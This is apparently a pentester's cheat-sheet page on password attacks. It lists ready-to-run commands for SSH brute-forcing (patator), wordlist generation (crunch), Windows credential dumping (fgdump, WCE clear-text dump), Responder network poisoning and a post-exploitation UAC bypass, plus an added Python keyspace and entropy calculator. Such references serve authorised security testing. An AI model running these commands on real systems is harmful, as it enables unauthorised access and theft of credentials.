# Passwords & credentials

## Related

[Wordlists and dictionaries](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/misc/wordlists-dictionaries)

## Online cracker

* [CrackStation](https://crackstation.net)
* [rumkin.com](http://rumkin.com/tools/cipher/)

## Online attacks

#### patator.py

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.\
[GitHub - lanjelot/patator](https://github.com/lanjelot/patator)

```bash
python -W ignore patator.py ssh_login host=<ip> user=FILE0 0=/root/usernames password=FILE1 1=Pass.txt
```

## Tools

* [Hashcat](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/exploitation/passwords/01-hashcat)
* [John the Ripper (JTR)](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/exploitation/passwords/02-john-the-ripper)

### identify hash

* [Hashes.com](https://hashes.com/en/tools/hash_identifier)

```bash
hashid <hash>
```

```bash
hash-identifier
```

## Key space brute force

### crunch

```bash
crunch 6 6 0123456789ABCDEF -o crunch1.txt
```

Pre-defined character set

```bash
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
```

More customized passwords

```
@ - Lower case alpha characters
, - Upper case alpha characters
% - Numeric characters
^ - Special characters including space 
```

```bash
crunch 8 8 -t ,@@^^%%%
```
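How large the key spaces above are, as an added example (not part of the original cheat sheet or of crunch): it computes the candidate count and output size for the two crunch invocations shown, and the entropy a password policy gives up when users follow such a template. The function names and the 33-character size of the `^` class are assumptions.

```python
import math
import string

# Placeholder classes from the table above. The size of the "^" class (33) is an
# assumption: the 32 ASCII punctuation characters plus space.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": string.punctuation + " ",
}


def charset_keyspace(min_len, max_len, charset):
    """Candidates and output bytes for `crunch <min> <max> <charset>`."""
    n = len(set(charset))
    lengths = range(min_len, max_len + 1)
    # Each candidate is written as one line: its length plus a newline.
    return sum(n ** k for k in lengths), sum((k + 1) * n ** k for k in lengths)


def template_keyspace(template):
    """Candidates and output bytes for `crunch <len> <len> -t <template>`."""
    lines = 1
    for ch in template:
        # Non-placeholder characters are literals: a factor of 1.
        lines *= len(PLACEHOLDERS.get(ch, ch))
    return lines, lines * (len(template) + 1)


def entropy_bits(candidates):
    """Bits of entropy if a password is drawn uniformly from the keyspace."""
    return math.log2(candidates)


def lost_bits(template):
    """Entropy given up versus a random printable-ASCII password of equal length."""
    return len(template) * math.log2(95) - entropy_bits(template_keyspace(template)[0])


if __name__ == "__main__":
    runs = {
        "crunch 6 6 0123456789ABCDEF": charset_keyspace(6, 6, "0123456789ABCDEF"),
        "crunch 8 8 -t ,@@^^%%%": template_keyspace(",@@^^%%%"),
    }
    for cmd, (lines, size) in runs.items():
        print(f"{cmd}: {lines:,} candidates, {size:,} bytes, {entropy_bits(lines):.1f} bits")
```

An 8-character password that follows the `,@@^^%%%` shape carries roughly 34 bits of entropy, about 18 bits fewer than eight uniformly random printable characters.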

### fgdump

In-memory attack (injects a DLL) for dumping system passwords

```bash
fgdump.exe
type 127.0.0.1.pwdump
```

Alternative: Pwdump

### Windows Credentials Editor (WCE)

> Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

[Download Site](https://www.ampliasecurity.com/research/windows-credentials-editor/)

List logon sessions

```bash
wce -l
```

Dump clear text passwords

```bash
wce -w
```

### responder.py (windows creds)

> Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.\
> [GitHub - lgandx/Responder](https://github.com/lgandx/Responder)

```bash
python ./Responder.py -i <own-ip> -b Off -r Off -w On
```

### bypassuac

Used to bypass UAC post-exploitation: <http://thehackerplaybook.com/Download/bypassuac.zip>

```
run bypassuac
background
sessions -i 2
getsystem
```

## Specific services, apps, files

### fcrackzip

> A braindead program for cracking encrypted ZIP archives. Forked from <http://oldhome.schmorp.de/marc/fcrackzip.html>\
> [GitHub - hyc/fcrackzip](https://github.com/hyc/fcrackzip)

```bash
fcrackzip -u -D -p <file-with-pws> file.zip
```
